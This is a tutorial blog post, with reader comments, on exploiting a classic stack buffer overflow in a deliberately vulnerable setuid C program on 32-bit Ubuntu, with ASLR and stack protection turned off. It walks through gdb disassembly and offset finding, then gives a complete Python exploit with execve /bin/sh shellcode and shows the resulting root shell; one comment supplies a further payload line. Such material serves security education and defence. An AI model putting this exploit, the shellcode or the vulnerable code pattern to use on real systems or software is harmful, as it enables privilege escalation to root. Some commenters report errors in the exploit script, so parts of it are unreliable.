Classic Stack Based Buffer Overflow

VM Setup: Ubuntu 12.04 (x86)

This post is the most simplest of the exploit development tutorial series and in the internet you can already find many articles about it. Despite its abundance and familiarity, I prefer to write my own blog post for it, since it would serve as a prerequisite for many of my future posts!!

What is Buffer Overflow?

Copying source buffer into destination buffer could result in overflow when

Source string length is greater than destination string length.
No size check is performed.

There are two types of buffer overflow:

Stack Based Buffer Overflow – Here the destination buffer resides in stack
Heap Based Buffer Overflow – Here the destination buffer resides in heap

Here in this post, I will talk only about stack based buffer overflow. Heap overflows will be discussed in ‘Level 3’ of Linux (x86) Exploit Development Tutorial Series!!

Buffer overflow bugs lead to arbitrary code execution!!

What is arbitrary code execution?

Arbitrary code execution allows attacker to execute his code inorder to gain control of the victim machine. Gaining control of victim machine is achieved using many ways like spawning a root shell, adding a new user, opening a network port etc…

Sounds interesting, enough of definitions lets look into a buffer overflow vulnerable code!!

Vulnerable Code:

//vuln.c
#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]) {
        /* [1] */ char buf[256];
        /* [2] */ strcpy(buf,argv[1]);
        /* [3] */ printf("Input:%s\n",buf);
        return 0;
}

Compilation Commands:

#echo 0 > /proc/sys/kernel/randomize_va_space
$gcc -g -fno-stack-protector -z execstack -o vuln vuln.c
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln

Line [2] of the above vulnerable program shows us that a buffer overflow bug exists. And this bug could lead to arbitrary code execution since source buffer contents are user provided input!!

How arbitrary code execution is achieved?

Arbitrary code execution is achieved using a technique called “Return Address Overwrite“. This technique helps the attacker to overwrite the ‘return address’ located in stack and this overwrite would lead to arbitrary code execution.

Before looking into the exploit code, for better understanding, lets disassemble and draw the stack layout for vulnerable code!!

Disassembly:

(gdb) disassemble main
Dump of assembler code for function main:
   //Function Prologue
   0x08048414 <+0>:	push   %ebp                      //backup caller's ebp
   0x08048415 <+1>:	mov    %esp,%ebp                 //set callee's ebp to esp

   0x08048417 <+3>:	and    $0xfffffff0,%esp          //stack alignment
   0x0804841a <+6>:	sub    $0x110,%esp               //stack space for local variables
   0x08048420 <+12>:	mov    0xc(%ebp),%eax            //eax = argv
   0x08048423 <+15>:	add    $0x4,%eax                 //eax = &argv[1]
   0x08048426 <+18>:	mov    (%eax),%eax               //eax = argv[1]
   0x08048428 <+20>:	mov    %eax,0x4(%esp)            //strcpy arg2 
   0x0804842c <+24>:	lea    0x10(%esp),%eax           //eax = 'buf' 
   0x08048430 <+28>:	mov    %eax,(%esp)               //strcpy arg1
   0x08048433 <+31>:	call   0x8048330 <strcpy@plt>    //call strcpy
   0x08048438 <+36>:	mov    $0x8048530,%eax           //eax = format str "Input:%s\n"
   0x0804843d <+41>:	lea    0x10(%esp),%edx           //edx = buf
   0x08048441 <+45>:	mov    %edx,0x4(%esp)            //printf arg2
   0x08048445 <+49>:	mov    %eax,(%esp)               //printf arg1
   0x08048448 <+52>:	call   0x8048320 <printf@plt>    //call printf
   0x0804844d <+57>:	mov    $0x0,%eax                 //return value 0

   //Function Epilogue
   0x08048452 <+62>:	leave                            //mov ebp, esp; pop ebp; 
   0x08048453 <+63>:	ret                              //return
End of assembler dump.
(gdb)

Stack Layout:

As we already know user input of size greater than 256 would overflow the destination buffer and overwrite the return address stored in stack. Lets test it out by sending a series of “A”‘s .

Test Step 1: Is Return Address Overwrite possible?

$ gdb -q vuln
Reading symbols from /home/sploitfun/lsploits/new/csof/vuln...done.
(gdb) r `python -c 'print "A"*300'`
Starting program: /home/sploitfun/lsploits/new/csof/vuln `python -c 'print "A"*300'`
Input:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) p/x $eip
$1 = 0x41414141
(gdb)

Above output shows that Instruction Pointer Register (EIP) is overwritten with “AAAA” and this confirms return address overwrite is possible!!

Test Step 2: What is the offset from Destination Buffer?

Here lets find out at what offset return address is located from destination buffer ‘buf’. Having disassembled and drawn the stack layout for main(), lets now try to find offset location information!! Stack Layout shows that return address is located at offset (0x10c) from destination buffer ‘buf’. 0x10c is calculated as follows:

0x10c = 0x100 + 0x8 + 0x4

where

0x100 is ‘buf’ size
0x8 is alignment space
0x4 is caller’s EBP

Thus user input of form “A” * 268 + “B” * 4, overwrites ‘buf’, alignment space and caller’s EBP with “A”‘s and return address with “BBBB”.

$ gdb -q vuln
Reading symbols from /home/sploitfun/lsploits/new/csof/vuln...done.
(gdb) r `python -c 'print "A"*268 + "B"*4'`
Starting program: /home/sploitfun/lsploits/new/csof/vuln `python -c 'print "A"*268 + "B"*4'`
Input:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) p/x $eip
$1 = 0x42424242
(gdb)

Above output shows that attacker gets control over return address. Return address located at stack location (0xbffff1fc) is overwritten with “BBBB”. With these informations, lets write an exploit program to achieve arbitrary code execution.

Exploit Code:

#exp.py 
#!/usr/bin/env python
import struct
from subprocess import call

#Stack address where shellcode is copied.
ret_addr = 0xbffff1d0       
              
#Spawn a shell
#execve(/bin/sh)
scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

#endianess convertion
def conv(num):
 return struct.pack("<I",num)

# buf = Junk + RA + NOP's + Shellcode
buf = "A" * 268
buf += conv(ret_addr)
buf += "\x90" * 100
buf += scode

print "Calling vulnerable program"
call(["./vuln", buf])

Executing above exploit program gives us root shell as shown below:

$ python exp.py 
Calling vulnerable program
Input:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��������������������������������������������������������������������������������������������������������1�Ph//shh/bin��P��S���

# id
uid=1000(sploitfun) gid=1000(sploitfun) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),1000(sploitfun)
# exit
$

NOTE: Inorder to get this root shell, we turned off many exploit mitigation techniques. Infact for all the posts in level 1, I have disabled these exploit mitigation techniques, since the objective of level 1, is to introduce you to vulnerabilities. And real fun happens when we get to “Level 2” of Linux (x86) Exploit Development Tutorial Series, where I will talk about bypassing these exploit mitigation techniques!!!

10 thoughts on “Classic Stack Based Buffer Overflow”

tester says:

December 27, 2015 at 4:09 pm

Thanks for your exploit articles!
If you read this article and you exploit works under gdb but not without: here is the soution to your problem: http://www.mathyvanhoef.com/2012/11/common-pitfalls-when-writing-exploits.html

LikeLiked by 1 person

Ken says:

October 14, 2016 at 7:57 pm

Exploit code contains syntax errors. Line 15 EOL while scanning single-quoted string. Is it just me, or is something missing?

LikeLiked by 1 person

hasnydes says:

December 11, 2016 at 8:43 am

You didn’t tell how to get this address from gdb .. to see where our shellcode in
“ret_addr = 0xbffff1d0 “

LikeLiked by 3 people

- Nathan Jester says:
  
  July 3, 2017 at 4:34 pm
  
  I know this is an older post, but perhaps it will help others who have the same question. I was able to determine the address of ESP on my system in the following way.
  
  use the command:
  
  Program received signal SIGSEGV, Segmentation fault.
  0x42424242 in ?? ()
  (gdb) x/x $esp
  0xbffff1f0: 0x43434343
  
  This will tell you where ESP has been overwritten. That will be the value that you replace your \x42’s with. You must allow for the endianness as well.
  
  so:
  
  buffer = “\x41” * 268 + “\xf0\x1f\xff\xbf” + “\x90” * 100 + shellcode
  
  LikeLike
  
Sploitfun- Can't "peform" stack based buffer overflow in GDB - Blog Xclusive News says:

August 6, 2017 at 12:37 am

[…] While trying to go through the tutorial in : https://sploitfun.wordpress.com/2015/05/08/classic-stack-based-buffer-overflow/ […]

LikeLike

kevin says:

January 31, 2018 at 12:59 pm

EXPloit code are wrong！

LikeLiked by 1 person

Vadym says:

December 30, 2019 at 4:33 pm

How did you calculate address 0xbffff1d0 ?
I can got why it less than 0xbffff1fc ( ), because shell code places at bigger address than stored at stack.

LikeLike

- Vadym says:
  
  January 2, 2020 at 7:34 am
  
  I understand now, 0xbffff1d0 is used because shell code is places before EIP, not after.
  
  LikeLike
  
jacksonSang says:

October 21, 2020 at 1:35 pm

i have a problem about how to calculate alignment space?

LikeLike

Nikolaos Parisis says:

March 19, 2021 at 11:36 am

can you please explain why not just put the NOPs (272-29) + shellcode(25) + RET (4) and instead you are overflowing it with 268 “A”s and appending the RET and then appending NOPs and in the end the shellcode? I mean, why overflow it and then inject the NOPs and shellcode? Does it work also like this? We could use the NOPs and the actual shellcode to overflow and the RET in the end right? Thanks a lot 🙂

LikeLike